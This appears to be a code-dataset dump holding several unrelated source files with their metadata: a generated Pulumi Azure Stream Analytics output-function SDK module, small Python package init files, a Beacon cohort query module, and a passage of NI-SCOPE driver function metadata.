| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
309d1c06f8c7a4ab349f5afc4160afb6700eb987
| 27,095
|
py
|
Python
|
sdk/python/pulumi_azure/streamanalytics/output_function.py
|
henriktao/pulumi-azure
|
f1cbcf100b42b916da36d8fe28be3a159abaf022
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_azure/streamanalytics/output_function.py
|
henriktao/pulumi-azure
|
f1cbcf100b42b916da36d8fe28be3a159abaf022
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_azure/streamanalytics/output_function.py
|
henriktao/pulumi-azure
|
f1cbcf100b42b916da36d8fe28be3a159abaf022
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
__all__ = ['OutputFunctionArgs', 'OutputFunction']
@pulumi.input_type
class OutputFunctionArgs:
def __init__(__self__, *,
api_key: pulumi.Input[str],
function_app: pulumi.Input[str],
function_name: pulumi.Input[str],
resource_group_name: pulumi.Input[str],
stream_analytics_job_name: pulumi.Input[str],
batch_max_count: Optional[pulumi.Input[int]] = None,
batch_max_in_bytes: Optional[pulumi.Input[int]] = None,
name: Optional[pulumi.Input[str]] = None):
"""
The set of arguments for constructing a OutputFunction resource.
:param pulumi.Input[str] api_key: The API key for the Function.
:param pulumi.Input[str] function_app: The name of the Function App.
:param pulumi.Input[str] function_name: The name of the function in the Function App.
:param pulumi.Input[str] resource_group_name: The name of the Resource Group where the Stream Analytics Output should exist. Changing this forces a new resource to be created.
:param pulumi.Input[str] stream_analytics_job_name: The name of the Stream Analytics Job. Changing this forces a new resource to be created.
:param pulumi.Input[int] batch_max_count: The maximum number of events in each batch that's sent to the function. Defaults to `100`.
:param pulumi.Input[int] batch_max_in_bytes: The maximum batch size in bytes that's sent to the function. Defaults to `262144` (256 kB).
:param pulumi.Input[str] name: The name which should be used for this Stream Analytics Output. Changing this forces a new resource to be created.
"""
pulumi.set(__self__, "api_key", api_key)
pulumi.set(__self__, "function_app", function_app)
pulumi.set(__self__, "function_name", function_name)
pulumi.set(__self__, "resource_group_name", resource_group_name)
pulumi.set(__self__, "stream_analytics_job_name", stream_analytics_job_name)
if batch_max_count is not None:
pulumi.set(__self__, "batch_max_count", batch_max_count)
if batch_max_in_bytes is not None:
pulumi.set(__self__, "batch_max_in_bytes", batch_max_in_bytes)
if name is not None:
pulumi.set(__self__, "name", name)
@property
@pulumi.getter(name="apiKey")
def api_key(self) -> pulumi.Input[str]:
"""
The API key for the Function.
"""
return pulumi.get(self, "api_key")
@api_key.setter
def api_key(self, value: pulumi.Input[str]):
pulumi.set(self, "api_key", value)
@property
@pulumi.getter(name="functionApp")
def function_app(self) -> pulumi.Input[str]:
"""
The name of the Function App.
"""
return pulumi.get(self, "function_app")
@function_app.setter
def function_app(self, value: pulumi.Input[str]):
pulumi.set(self, "function_app", value)
@property
@pulumi.getter(name="functionName")
def function_name(self) -> pulumi.Input[str]:
"""
The name of the function in the Function App.
"""
return pulumi.get(self, "function_name")
@function_name.setter
def function_name(self, value: pulumi.Input[str]):
pulumi.set(self, "function_name", value)
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> pulumi.Input[str]:
"""
The name of the Resource Group where the Stream Analytics Output should exist. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "resource_group_name")
@resource_group_name.setter
def resource_group_name(self, value: pulumi.Input[str]):
pulumi.set(self, "resource_group_name", value)
@property
@pulumi.getter(name="streamAnalyticsJobName")
def stream_analytics_job_name(self) -> pulumi.Input[str]:
"""
The name of the Stream Analytics Job. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "stream_analytics_job_name")
@stream_analytics_job_name.setter
def stream_analytics_job_name(self, value: pulumi.Input[str]):
pulumi.set(self, "stream_analytics_job_name", value)
@property
@pulumi.getter(name="batchMaxCount")
def batch_max_count(self) -> Optional[pulumi.Input[int]]:
"""
The maximum number of events in each batch that's sent to the function. Defaults to `100`.
"""
return pulumi.get(self, "batch_max_count")
@batch_max_count.setter
def batch_max_count(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "batch_max_count", value)
@property
@pulumi.getter(name="batchMaxInBytes")
def batch_max_in_bytes(self) -> Optional[pulumi.Input[int]]:
"""
The maximum batch size in bytes that's sent to the function. Defaults to `262144` (256 kB).
"""
return pulumi.get(self, "batch_max_in_bytes")
@batch_max_in_bytes.setter
def batch_max_in_bytes(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "batch_max_in_bytes", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
The name which should be used for this Stream Analytics Output. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@pulumi.input_type
class _OutputFunctionState:
def __init__(__self__, *,
api_key: Optional[pulumi.Input[str]] = None,
batch_max_count: Optional[pulumi.Input[int]] = None,
batch_max_in_bytes: Optional[pulumi.Input[int]] = None,
function_app: Optional[pulumi.Input[str]] = None,
function_name: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
stream_analytics_job_name: Optional[pulumi.Input[str]] = None):
"""
Input properties used for looking up and filtering OutputFunction resources.
:param pulumi.Input[str] api_key: The API key for the Function.
:param pulumi.Input[int] batch_max_count: The maximum number of events in each batch that's sent to the function. Defaults to `100`.
:param pulumi.Input[int] batch_max_in_bytes: The maximum batch size in bytes that's sent to the function. Defaults to `262144` (256 kB).
:param pulumi.Input[str] function_app: The name of the Function App.
:param pulumi.Input[str] function_name: The name of the function in the Function App.
:param pulumi.Input[str] name: The name which should be used for this Stream Analytics Output. Changing this forces a new resource to be created.
:param pulumi.Input[str] resource_group_name: The name of the Resource Group where the Stream Analytics Output should exist. Changing this forces a new resource to be created.
:param pulumi.Input[str] stream_analytics_job_name: The name of the Stream Analytics Job. Changing this forces a new resource to be created.
"""
if api_key is not None:
pulumi.set(__self__, "api_key", api_key)
if batch_max_count is not None:
pulumi.set(__self__, "batch_max_count", batch_max_count)
if batch_max_in_bytes is not None:
pulumi.set(__self__, "batch_max_in_bytes", batch_max_in_bytes)
if function_app is not None:
pulumi.set(__self__, "function_app", function_app)
if function_name is not None:
pulumi.set(__self__, "function_name", function_name)
if name is not None:
pulumi.set(__self__, "name", name)
if resource_group_name is not None:
pulumi.set(__self__, "resource_group_name", resource_group_name)
if stream_analytics_job_name is not None:
pulumi.set(__self__, "stream_analytics_job_name", stream_analytics_job_name)
@property
@pulumi.getter(name="apiKey")
def api_key(self) -> Optional[pulumi.Input[str]]:
"""
The API key for the Function.
"""
return pulumi.get(self, "api_key")
@api_key.setter
def api_key(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "api_key", value)
@property
@pulumi.getter(name="batchMaxCount")
def batch_max_count(self) -> Optional[pulumi.Input[int]]:
"""
The maximum number of events in each batch that's sent to the function. Defaults to `100`.
"""
return pulumi.get(self, "batch_max_count")
@batch_max_count.setter
def batch_max_count(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "batch_max_count", value)
@property
@pulumi.getter(name="batchMaxInBytes")
def batch_max_in_bytes(self) -> Optional[pulumi.Input[int]]:
"""
The maximum batch size in bytes that's sent to the function. Defaults to `262144` (256 kB).
"""
return pulumi.get(self, "batch_max_in_bytes")
@batch_max_in_bytes.setter
def batch_max_in_bytes(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "batch_max_in_bytes", value)
@property
@pulumi.getter(name="functionApp")
def function_app(self) -> Optional[pulumi.Input[str]]:
"""
The name of the Function App.
"""
return pulumi.get(self, "function_app")
@function_app.setter
def function_app(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "function_app", value)
@property
@pulumi.getter(name="functionName")
def function_name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the function in the Function App.
"""
return pulumi.get(self, "function_name")
@function_name.setter
def function_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "function_name", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
The name which should be used for this Stream Analytics Output. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the Resource Group where the Stream Analytics Output should exist. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "resource_group_name")
@resource_group_name.setter
def resource_group_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "resource_group_name", value)
@property
@pulumi.getter(name="streamAnalyticsJobName")
def stream_analytics_job_name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the Stream Analytics Job. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "stream_analytics_job_name")
@stream_analytics_job_name.setter
def stream_analytics_job_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "stream_analytics_job_name", value)
class OutputFunction(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
api_key: Optional[pulumi.Input[str]] = None,
batch_max_count: Optional[pulumi.Input[int]] = None,
batch_max_in_bytes: Optional[pulumi.Input[int]] = None,
function_app: Optional[pulumi.Input[str]] = None,
function_name: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
stream_analytics_job_name: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
Manages a Stream Analytics Output Function.
## Example Usage
```python
import pulumi
import pulumi_azure as azure
example_resource_group = azure.core.ResourceGroup("exampleResourceGroup")
example_account = azure.storage.Account("exampleAccount",
resource_group_name=example_resource_group.name,
location=example_resource_group.location,
account_tier="Standard",
account_replication_type="LRS")
example_plan = azure.appservice.Plan("examplePlan",
location=example_resource_group.location,
resource_group_name=example_resource_group.name,
kind="FunctionApp",
reserved=True,
sku=azure.appservice.PlanSkuArgs(
tier="Dynamic",
size="Y1",
))
example_function_app = azure.appservice.FunctionApp("exampleFunctionApp",
location=example_resource_group.location,
resource_group_name=example_resource_group.name,
app_service_plan_id=example_plan.id,
storage_account_name=example_account.name,
storage_account_access_key=example_account.primary_access_key,
os_type="linux",
version="~3")
example_job = azure.streamanalytics.Job("exampleJob",
resource_group_name=example_resource_group.name,
location=example_resource_group.location,
streaming_units=3,
transformation_query=\"\"\" SELECT *
INTO [YourOutputAlias]
FROM [YourInputAlias]
\"\"\")
example_output_function = azure.streamanalytics.OutputFunction("exampleOutputFunction",
resource_group_name=example_job.resource_group_name,
stream_analytics_job_name=example_job.name,
function_app=example_function_app.name,
function_name="examplefunctionname",
api_key="exampleapikey")
```
## Import
Stream Analytics Output Functions can be imported using the `resource id`, e.g.
```sh
$ pulumi import azure:streamanalytics/outputFunction:OutputFunction example /subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/group1/providers/Microsoft.StreamAnalytics/streamingjobs/job1/outputs/output1
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] api_key: The API key for the Function.
:param pulumi.Input[int] batch_max_count: The maximum number of events in each batch that's sent to the function. Defaults to `100`.
:param pulumi.Input[int] batch_max_in_bytes: The maximum batch size in bytes that's sent to the function. Defaults to `262144` (256 kB).
:param pulumi.Input[str] function_app: The name of the Function App.
:param pulumi.Input[str] function_name: The name of the function in the Function App.
:param pulumi.Input[str] name: The name which should be used for this Stream Analytics Output. Changing this forces a new resource to be created.
:param pulumi.Input[str] resource_group_name: The name of the Resource Group where the Stream Analytics Output should exist. Changing this forces a new resource to be created.
:param pulumi.Input[str] stream_analytics_job_name: The name of the Stream Analytics Job. Changing this forces a new resource to be created.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: OutputFunctionArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Manages a Stream Analytics Output Function.
## Example Usage
```python
import pulumi
import pulumi_azure as azure
example_resource_group = azure.core.ResourceGroup("exampleResourceGroup")
example_account = azure.storage.Account("exampleAccount",
resource_group_name=example_resource_group.name,
location=example_resource_group.location,
account_tier="Standard",
account_replication_type="LRS")
example_plan = azure.appservice.Plan("examplePlan",
location=example_resource_group.location,
resource_group_name=example_resource_group.name,
kind="FunctionApp",
reserved=True,
sku=azure.appservice.PlanSkuArgs(
tier="Dynamic",
size="Y1",
))
example_function_app = azure.appservice.FunctionApp("exampleFunctionApp",
location=example_resource_group.location,
resource_group_name=example_resource_group.name,
app_service_plan_id=example_plan.id,
storage_account_name=example_account.name,
storage_account_access_key=example_account.primary_access_key,
os_type="linux",
version="~3")
example_job = azure.streamanalytics.Job("exampleJob",
resource_group_name=example_resource_group.name,
location=example_resource_group.location,
streaming_units=3,
transformation_query=\"\"\" SELECT *
INTO [YourOutputAlias]
FROM [YourInputAlias]
\"\"\")
example_output_function = azure.streamanalytics.OutputFunction("exampleOutputFunction",
resource_group_name=example_job.resource_group_name,
stream_analytics_job_name=example_job.name,
function_app=example_function_app.name,
function_name="examplefunctionname",
api_key="exampleapikey")
```
## Import
Stream Analytics Output Functions can be imported using the `resource id`, e.g.
```sh
$ pulumi import azure:streamanalytics/outputFunction:OutputFunction example /subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/group1/providers/Microsoft.StreamAnalytics/streamingjobs/job1/outputs/output1
```
:param str resource_name: The name of the resource.
:param OutputFunctionArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(OutputFunctionArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
api_key: Optional[pulumi.Input[str]] = None,
batch_max_count: Optional[pulumi.Input[int]] = None,
batch_max_in_bytes: Optional[pulumi.Input[int]] = None,
function_app: Optional[pulumi.Input[str]] = None,
function_name: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
stream_analytics_job_name: Optional[pulumi.Input[str]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = OutputFunctionArgs.__new__(OutputFunctionArgs)
if api_key is None and not opts.urn:
raise TypeError("Missing required property 'api_key'")
__props__.__dict__["api_key"] = api_key
__props__.__dict__["batch_max_count"] = batch_max_count
__props__.__dict__["batch_max_in_bytes"] = batch_max_in_bytes
if function_app is None and not opts.urn:
raise TypeError("Missing required property 'function_app'")
__props__.__dict__["function_app"] = function_app
if function_name is None and not opts.urn:
raise TypeError("Missing required property 'function_name'")
__props__.__dict__["function_name"] = function_name
__props__.__dict__["name"] = name
if resource_group_name is None and not opts.urn:
raise TypeError("Missing required property 'resource_group_name'")
__props__.__dict__["resource_group_name"] = resource_group_name
if stream_analytics_job_name is None and not opts.urn:
raise TypeError("Missing required property 'stream_analytics_job_name'")
__props__.__dict__["stream_analytics_job_name"] = stream_analytics_job_name
super(OutputFunction, __self__).__init__(
'azure:streamanalytics/outputFunction:OutputFunction',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
api_key: Optional[pulumi.Input[str]] = None,
batch_max_count: Optional[pulumi.Input[int]] = None,
batch_max_in_bytes: Optional[pulumi.Input[int]] = None,
function_app: Optional[pulumi.Input[str]] = None,
function_name: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
stream_analytics_job_name: Optional[pulumi.Input[str]] = None) -> 'OutputFunction':
"""
Get an existing OutputFunction resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] api_key: The API key for the Function.
:param pulumi.Input[int] batch_max_count: The maximum number of events in each batch that's sent to the function. Defaults to `100`.
:param pulumi.Input[int] batch_max_in_bytes: The maximum batch size in bytes that's sent to the function. Defaults to `262144` (256 kB).
:param pulumi.Input[str] function_app: The name of the Function App.
:param pulumi.Input[str] function_name: The name of the function in the Function App.
:param pulumi.Input[str] name: The name which should be used for this Stream Analytics Output. Changing this forces a new resource to be created.
:param pulumi.Input[str] resource_group_name: The name of the Resource Group where the Stream Analytics Output should exist. Changing this forces a new resource to be created.
:param pulumi.Input[str] stream_analytics_job_name: The name of the Stream Analytics Job. Changing this forces a new resource to be created.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _OutputFunctionState.__new__(_OutputFunctionState)
__props__.__dict__["api_key"] = api_key
__props__.__dict__["batch_max_count"] = batch_max_count
__props__.__dict__["batch_max_in_bytes"] = batch_max_in_bytes
__props__.__dict__["function_app"] = function_app
__props__.__dict__["function_name"] = function_name
__props__.__dict__["name"] = name
__props__.__dict__["resource_group_name"] = resource_group_name
__props__.__dict__["stream_analytics_job_name"] = stream_analytics_job_name
return OutputFunction(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="apiKey")
def api_key(self) -> pulumi.Output[str]:
"""
The API key for the Function.
"""
return pulumi.get(self, "api_key")
@property
@pulumi.getter(name="batchMaxCount")
def batch_max_count(self) -> pulumi.Output[Optional[int]]:
"""
The maximum number of events in each batch that's sent to the function. Defaults to `100`.
"""
return pulumi.get(self, "batch_max_count")
@property
@pulumi.getter(name="batchMaxInBytes")
def batch_max_in_bytes(self) -> pulumi.Output[Optional[int]]:
"""
The maximum batch size in bytes that's sent to the function. Defaults to `262144` (256 kB).
"""
return pulumi.get(self, "batch_max_in_bytes")
@property
@pulumi.getter(name="functionApp")
def function_app(self) -> pulumi.Output[str]:
"""
The name of the Function App.
"""
return pulumi.get(self, "function_app")
@property
@pulumi.getter(name="functionName")
def function_name(self) -> pulumi.Output[str]:
"""
The name of the function in the Function App.
"""
return pulumi.get(self, "function_name")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
The name which should be used for this Stream Analytics Output. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> pulumi.Output[str]:
"""
The name of the Resource Group where the Stream Analytics Output should exist. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "resource_group_name")
@property
@pulumi.getter(name="streamAnalyticsJobName")
def stream_analytics_job_name(self) -> pulumi.Output[str]:
"""
The name of the Stream Analytics Job. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "stream_analytics_job_name")
| 46.079932
| 229
| 0.660934
| 3,327
| 27,095
| 5.117523
| 0.06823
| 0.069776
| 0.065782
| 0.050394
| 0.90215
| 0.888054
| 0.881534
| 0.855633
| 0.848526
| 0.840068
| 0
| 0.007877
| 0.245691
| 27,095
| 587
| 230
| 46.158433
| 0.825179
| 0.391511
| 0
| 0.693878
| 1
| 0
| 0.120551
| 0.026487
| 0
| 0
| 0
| 0
| 0
| 1
| 0.159864
| false
| 0.003401
| 0.017007
| 0
| 0.272109
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
a5008a61d570efdb7c452034087ca45eb10356c6
| 171
|
py
|
Python
|
CPAC/pipeline/__init__.py
|
Lawreros/C-PAC
|
ce26ba9a38cbd401cd405150eeed23b805007724
|
[
"BSD-3-Clause"
] | null | null | null |
CPAC/pipeline/__init__.py
|
Lawreros/C-PAC
|
ce26ba9a38cbd401cd405150eeed23b805007724
|
[
"BSD-3-Clause"
] | null | null | null |
CPAC/pipeline/__init__.py
|
Lawreros/C-PAC
|
ce26ba9a38cbd401cd405150eeed23b805007724
|
[
"BSD-3-Clause"
] | null | null | null |
from . import cpac_runner
from . import cpac_group_runner
from . import cpac_pipeline
from . import cpac_basc_pipeline
from . import cpac_cwas_pipeline
__all__ = ['run']
| 21.375
| 32
| 0.80117
| 25
| 171
| 5
| 0.4
| 0.4
| 0.56
| 0.32
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.140351
| 171
| 7
| 33
| 24.428571
| 0.85034
| 0
| 0
| 0
| 0
| 0
| 0.017544
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.833333
| 0
| 0.833333
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
a5159aa1b231a842ec12fa13e72e88cd7531ac95
| 111
|
py
|
Python
|
web/__init__.py
|
Saphyel/recipes
|
b1b67ffe9ed5ddd27bc67a3887a8e9a82614e89a
|
[
"MIT"
] | null | null | null |
web/__init__.py
|
Saphyel/recipes
|
b1b67ffe9ed5ddd27bc67a3887a8e9a82614e89a
|
[
"MIT"
] | null | null | null |
web/__init__.py
|
Saphyel/recipes
|
b1b67ffe9ed5ddd27bc67a3887a8e9a82614e89a
|
[
"MIT"
] | null | null | null |
from .about import router
from .categories import router
from .chefs import router
from .recipes import router
| 22.2
| 30
| 0.81982
| 16
| 111
| 5.6875
| 0.4375
| 0.527473
| 0.527473
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.144144
| 111
| 4
| 31
| 27.75
| 0.957895
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
ebbfb7892a8ef70527df0d12e36ad7ae6ed1a59b
| 1,368
|
py
|
Python
|
beacon/db/cohorts.py
|
elixir-luxembourg/BH2021-beacon-2.x-omop
|
d811e7902909f5d38f9a5964ff0ff3335ec0056a
|
[
"Apache-2.0"
] | null | null | null |
beacon/db/cohorts.py
|
elixir-luxembourg/BH2021-beacon-2.x-omop
|
d811e7902909f5d38f9a5964ff0ff3335ec0056a
|
[
"Apache-2.0"
] | null | null | null |
beacon/db/cohorts.py
|
elixir-luxembourg/BH2021-beacon-2.x-omop
|
d811e7902909f5d38f9a5964ff0ff3335ec0056a
|
[
"Apache-2.0"
] | null | null | null |
from beacon.db.filters import apply_filters
from beacon.db.utils import query_id
from beacon.request.model import RequestParams
from beacon.db import client
def get_cohorts(entry_id: str, qparams: RequestParams):
query = apply_filters({}, qparams.query.filters)
return client.beacon.cohorts\
.find(query)\
.skip(qparams.query.pagination.skip)\
.limit(qparams.query.pagination.limit)
def get_cohort_with_id(entry_id: str, qparams: RequestParams):
query = apply_filters({}, qparams.query.filters)
query = query_id(query, entry_id)
return client.beacon.cohorts\
.find(query)\
.skip(qparams.query.pagination.skip)\
.limit(qparams.query.pagination.limit)
def get_individuals_of_cohort(entry_id: str, qparams: RequestParams):
# TODO
pass
def get_filtering_terms_of_cohort(entry_id: str, qparams: RequestParams):
# TODO
pass
def get_variants_of_cohort(entry_id: str, qparams: RequestParams):
# TODO: To be fixed in the model
pass
def get_biosamples_of_cohort(entry_id: str, qparams: RequestParams):
# TODO: To be fixed in the model
pass
def get_runs_of_cohort(entry_id: str, qparams: RequestParams):
# TODO: To be fixed in the model
pass
def get_analyses_of_cohort(entry_id: str, qparams: RequestParams):
# TODO: To be fixed in the model
pass
| 26.307692
| 73
| 0.724415
| 190
| 1,368
| 5.021053
| 0.215789
| 0.066038
| 0.083857
| 0.142558
| 0.752621
| 0.752621
| 0.752621
| 0.752621
| 0.752621
| 0.752621
| 0
| 0
| 0.184211
| 1,368
| 51
| 74
| 26.823529
| 0.854839
| 0.097222
| 0
| 0.551724
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.019608
| 0
| 1
| 0.275862
| false
| 0.206897
| 0.137931
| 0
| 0.482759
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
ebc011bbe0ce6a5a1786929f9db21a7d001f283b
| 312,963
|
py
|
Python
|
src/niscope/metadata/functions.py
|
WhiteLupus/nimi-python
|
4e05b9a64f08ed2c929932d8d586c7114c46cf04
|
[
"MIT"
] | 1
|
2019-09-18T14:28:47.000Z
|
2019-09-18T14:28:47.000Z
|
src/niscope/metadata/functions.py
|
WhiteLupus/nimi-python
|
4e05b9a64f08ed2c929932d8d586c7114c46cf04
|
[
"MIT"
] | null | null | null |
src/niscope/metadata/functions.py
|
WhiteLupus/nimi-python
|
4e05b9a64f08ed2c929932d8d586c7114c46cf04
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
# This file is generated from NI-SCOPE API metadata version 19.1.0d50
functions = {
'Abort': {
'documentation': {
'description': '\nAborts an acquisition and returns the digitizer to the Idle state. Call\nthis function if the digitizer times out waiting for a trigger.\n'
},
'parameters': [
{
'direction': 'in',
'documentation': {
'description': '\nThe instrument handle you obtain from niScope_init that identifies a\nparticular instrument session.\n'
},
'name': 'vi',
'type': 'ViSession'
}
],
'returns': 'ViStatus'
},
'AcquisitionStatus': {
'documentation': {
'description': '\nReturns status information about the acquisition to the **status**\noutput parameter.\n'
},
'parameters': [
{
'direction': 'in',
'documentation': {
'description': '\nThe instrument handle you obtain from niScope_init that identifies a\nparticular instrument session.\n'
},
'name': 'vi',
'type': 'ViSession'
},
{
'direction': 'out',
'documentation': {
'description': '\nReturns whether the acquisition is complete, in progress, or unknown.\n\n**Defined Values**\n\nNISCOPE_VAL_ACQ_COMPLETE\n\nNISCOPE_VAL_ACQ_IN_PROGRESS\n\nNISCOPE_VAL_ACQ_STATUS_UNKNOWN\n'
},
'enum': 'AcquisitionStatus',
'name': 'acquisitionStatus',
'type': 'ViInt32'
}
],
'returns': 'ViStatus'
},
'ActualMeasWfmSize': {
'codegen_method': 'private',
'documentation': {
'description': 'Returns the total available size of an array measurement acquisition.'
},
'parameters': [
{
'direction': 'in',
'documentation': {
'description': '\nThe instrument handle you obtain from niScope_init that identifies a\nparticular instrument session.\n'
},
'name': 'vi',
'type': 'ViSession'
},
{
'direction': 'in',
'documentation': {
'description': '\nThe `array\nmeasurement <REPLACE_DRIVER_SPECIFIC_URL_2(array_measurements_refs)>`__\nto perform.\n'
},
'enum': 'ArrayMeasurement',
'name': 'arrayMeasFunction',
'type': 'ViInt32'
},
{
'direction': 'out',
'documentation': {
'description': '\nReturns the size (in number of samples) of the resulting analysis\nwaveform.\n'
},
'name': 'measWaveformSize',
'type': 'ViInt32'
}
],
'render_in_session_base': True,
'returns': 'ViStatus'
},
'ActualNumWfms': {
'codegen_method': 'private',
'documentation': {
'description': '\nHelps you to declare appropriately sized waveforms. NI-SCOPE handles the\nchannel list parsing for you.\n'
},
'parameters': [
{
'direction': 'in',
'documentation': {
'description': '\nThe instrument handle you obtain from niScope_init that identifies a\nparticular instrument session.\n'
},
'name': 'vi',
'type': 'ViSession'
},
{
'direction': 'in',
'documentation': {
'description': "\nThe channel to configure. For more information, refer to `Channel String\nSyntax <REPLACE_DRIVER_SPECIFIC_URL_2(scopefunc.chm','cvichannelstringsyntaxforc)>`__.\n"
},
'name': 'channelList',
'type': 'ViConstString'
},
{
'direction': 'out',
'documentation': {
'description': '\nReturns the number of records times the number of channels; if you are\noperating in DDC mode (NI 5620/5621 only), this value is multiplied by\ntwo.\n'
},
'name': 'numWfms',
'type': 'ViInt32'
}
],
'returns': 'ViStatus'
},
'ActualRecordLength': {
'codegen_method': 'no',
'documentation': {
'description': '\nReturns the actual number of points the digitizer acquires for each\nchannel. After configuring the digitizer for an acquisition, call this\nfunction to determine the size of the waveforms that the digitizer\nacquires. The value is equal to or greater than the minimum number of\npoints specified in any of the Configure Horizontal functions.\n'
},
'parameters': [
{
'direction': 'in',
'documentation': {
